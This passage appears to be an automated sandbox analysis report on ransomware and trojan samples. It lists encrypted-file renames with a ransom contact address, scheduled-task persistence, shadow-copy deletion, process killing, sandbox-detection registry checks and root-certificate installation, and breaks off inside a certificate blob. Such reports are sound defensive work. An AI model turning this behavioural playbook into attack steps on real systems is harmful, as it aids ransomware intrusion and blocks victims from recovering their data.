File created	C:\Program Files\Java\jre7\lib\zi\Asia\Baghdad.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files\NewSplit.xsl	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEWBY.GIF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\GIFT.XML.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\EssentialReport.dotx	16.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter_partly-cloudy.png	16.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\tab_off.gif.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0294989.WMF	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01069_.WMF	16.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Belem.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

1720 3384 WerFault.exe 21.exe
4828 3968 WerFault.exe BTRSetp.exe

pid	pid_target	process	target process
1720	3384	WerFault.exe	21.exe
4828	3968	WerFault.exe	BTRSetp.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

azur.exewinit.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	azur.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	azur.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Creates scheduled task(s) 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1520	schtasks.exe
1416	schtasks.exe
3664	schtasks.exe
4116	schtasks.exe
4524	schtasks.exe
2016	schtasks.exe
1036	schtasks.exe
1636	schtasks.exe
1528	schtasks.exe
3908	schtasks.exe
2164	schtasks.exe
4564	schtasks.exe
1680	schtasks.exe

Delays execution with timeout.exe 6 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

3584 timeout.exe
2860 timeout.exe
4708 timeout.exe
1016 timeout.exe
2928 timeout.exe
2524 timeout.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exeNETSTAT.EXE

pid process

5272 ipconfig.exe
2920 NETSTAT.EXE
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

4044 vssadmin.exe
1112 vssadmin.exe
Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4792 taskkill.exe
2412 taskkill.exe
1224 taskkill.exe
1812 taskkill.exe
3792 taskkill.exe
2940 taskkill.exe

pid	process
3584	timeout.exe
2860	timeout.exe
4708	timeout.exe
1016	timeout.exe
2928	timeout.exe
2524	timeout.exe

pid	process
5272	ipconfig.exe
2920	NETSTAT.EXE

pid	process
4044	vssadmin.exe
1112	vssadmin.exe

pid	process
4792	taskkill.exe
2412	taskkill.exe
1224	taskkill.exe
1812	taskkill.exe
3792	taskkill.exe
2940	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEiexplore.exeiexplore.exeIEXPLORE.EXEmshta.exemstsc.exeIEXPLORE.EXEcmmon32.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage\iplogger.org\ = "18"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d00f0c3d9abed601	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "18"	IEXPLORE.EXE
Key created	\Registry\User\S-1-5-21-3825035466-2522850611-591511364-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	mstsc.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage\iplogger.org\NumberOfSubdomains = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{6B1DA300-2A8C-11EB-AE0F-E67B5CAEC115} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "312571896"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FD934230-2A8C-11EB-AE0F-E67B5CAEC115} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage\iplogger.org	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\Registry\User\S-1-5-21-3825035466-2522850611-591511364-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	cmmon32.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe

Modifies data under HKEY_USERS 43 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	svchost.exe

Modifies registry class 3 IoCs

Processes:

winit.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

REG.exe

pid process

3552 REG.exe

pid	process
3552	REG.exe

Modifies system certificate store 2 TTPs 20 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

14.exewinit.exealiens.exejg2_2qua.exeintro.exeintro.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	14.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	14.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d8495